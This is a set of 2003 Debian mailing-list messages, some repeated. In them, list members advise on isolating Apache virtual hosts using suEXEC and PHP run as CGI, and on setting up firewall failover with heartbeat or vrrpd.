http://www.gnupg.org iD8DBQE+bguJEzqHF8R72ekRApCeAJ9xBSZUqs/4anueP+qUXevmwLMEdQCfTg43 NBzKsI3G9/3SKJN8+N2J540= =opBe -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Apache Virtual Hosts Chroot ?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi You may find useful the apache's suEXEC wrapper, it can be configured to be used inside a virtualhost... http://httpd.apache.org/docs/suexec.html This won't work with php scripts if you have mod_php.so loaded ( the php interpreter will run as apache user ) but if load is not the problem you can run php scripts as cgis using php4 as external handler.. ( maybe only in the locations that user's php scripts could be dangerous ) have a look at: http://www-pat.fnal.gov/cern/mipsabi.html and: http://www.psoft.net/HSdocumentation/sysadmin/php_installation.html Just my two cents Victor On Tuesday 25 February 2003 10:15, debian-isp wrote: > Hi all ! > > I am just asking myself how to secure our webserver with a couple of > virtual hosts. Currently we have a large installation of typo3 running. It > has a feature called fileadmin with which you can easily upload files. As > it is thereby possible to upload php scripts and execute via the browser it > is to my opionion possible to access other users files. As the webserver > and the files all have the same user, needed by the system. Is there a way > to secure this: > > - chrooting virtual hosts in apache ? > - running multiple instances of apache > - some kind of security system with users and groups > - using directory settings ? > > Any ideas > > __ > Nik Engel NETWAYS GmbH > Senior Systems Engineer Deutschherrnstr. 47a > Fon.0911/92885-13 D-90429 Nürnberg > Fax.0911/92885-33 > [EMAIL PROTECTED] www.netways.de -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE+W1WNEzqHF8R72ekRAuhgAJ9Lnjc09t4RX/VHzggFsH1untbz7ACfTYwN t4rVOUI/OhUAJXLMifICoWo= =de0N -END PGP SIGNATURE-
Re: Apache Virtual Hosts Chroot ?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi You may find useful the apache's suEXEC wrapper, it can be configured to be used inside a virtualhost... http://httpd.apache.org/docs/suexec.html This won't work with php scripts if you have mod_php.so loaded ( the php interpreter will run as apache user ) but if load is not the problem you can run php scripts as cgis using php4 as external handler.. ( maybe only in the locations that user's php scripts could be dangerous ) have a look at: http://www-pat.fnal.gov/cern/mipsabi.html and: http://www.psoft.net/HSdocumentation/sysadmin/php_installation.html Just my two cents Victor On Tuesday 25 February 2003 10:15, debian-isp wrote: > Hi all ! > > I am just asking myself how to secure our webserver with a couple of > virtual hosts. Currently we have a large installation of typo3 running. It > has a feature called fileadmin with which you can easily upload files. As > it is thereby possible to upload php scripts and execute via the browser it > is to my opionion possible to access other users files. As the webserver > and the files all have the same user, needed by the system. Is there a way > to secure this: > > - chrooting virtual hosts in apache ? > - running multiple instances of apache > - some kind of security system with users and groups > - using directory settings ? > > Any ideas > > __ > Nik Engel NETWAYS GmbH > Senior Systems Engineer Deutschherrnstr. 47a > Fon.0911/92885-13 D-90429 Nürnberg > Fax.0911/92885-33 > [EMAIL PROTECTED] www.netways.de -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE+W1WNEzqHF8R72ekRAuhgAJ9Lnjc09t4RX/VHzggFsH1untbz7ACfTYwN t4rVOUI/OhUAJXLMifICoWo= =de0N -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: cluster on firewall?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Thursday 06 February 2003 09:32, Kristof Goossens wrote: > On Thu, Feb 06, 2003 at 03:09:34AM +0200, Haim Ashkenazi wrote: > > Hi > > > > I have setup a firewall with 4 legs as follows: > > * One leg goes to the router (cisco). > > * Second leg goes to a switch connected to the internal network > > (10.20...). > > * The third and fourth legs are both for the dmz. one goes to a > > switch with many dmz hosts connected to it, and the other goes > > directly to an isolated dmz host (which the firewall acts as a > > proxy-arp for it). > > > > I've used woody+iptables+shorewall for this setting. > > > > Now, since the firewall is the most critical host, I want to setup some > > kind of failsafe, so even if that host dies all the traffic will go > > through another host. > > > > Since I don't even have an idea where to start, I'll appreciate any > > ideas/comments/pointers to documentations, etc... > > check out the heartbeat package. It might be just the thing you are looking > for... > > Kind regards, > Kristof you might find usefull the vrrpd code. apt-cache show vrrpd Kind regards Victor -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE+Q3EUEzqHF8R72ekRAsQHAJ9UpiiWaUQLN/fYssakOB3E6QplLwCfVbZX H1Y5HmaAAlw8Y3bFn5WtnZQ= =fpqN -END PGP SIGNATURE-
Re: cluster on firewall?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Thursday 06 February 2003 09:32, Kristof Goossens wrote: > On Thu, Feb 06, 2003 at 03:09:34AM +0200, Haim Ashkenazi wrote: > > Hi > > > > I have setup a firewall with 4 legs as follows: > > * One leg goes to the router (cisco). > > * Second leg goes to a switch connected to the internal network > > (10.20...). > > * The third and fourth legs are both for the dmz. one goes to a > > switch with many dmz hosts connected to it, and the other goes > > directly to an isolated dmz host (which the firewall acts as a > > proxy-arp for it). > > > > I've used woody+iptables+shorewall for this setting. > > > > Now, since the firewall is the most critical host, I want to setup some > > kind of failsafe, so even if that host dies all the traffic will go > > through another host. > > > > Since I don't even have an idea where to start, I'll appreciate any > > ideas/comments/pointers to documentations, etc... > > check out the heartbeat package. It might be just the thing you are looking > for... > > Kind regards, > Kristof you might find usefull the vrrpd code. apt-cache show vrrpd Kind regards Victor -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE+Q3EUEzqHF8R72ekRAsQHAJ9UpiiWaUQLN/fYssakOB3E6QplLwCfVbZX H1Y5HmaAAlw8Y3bFn5WtnZQ= =fpqN -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
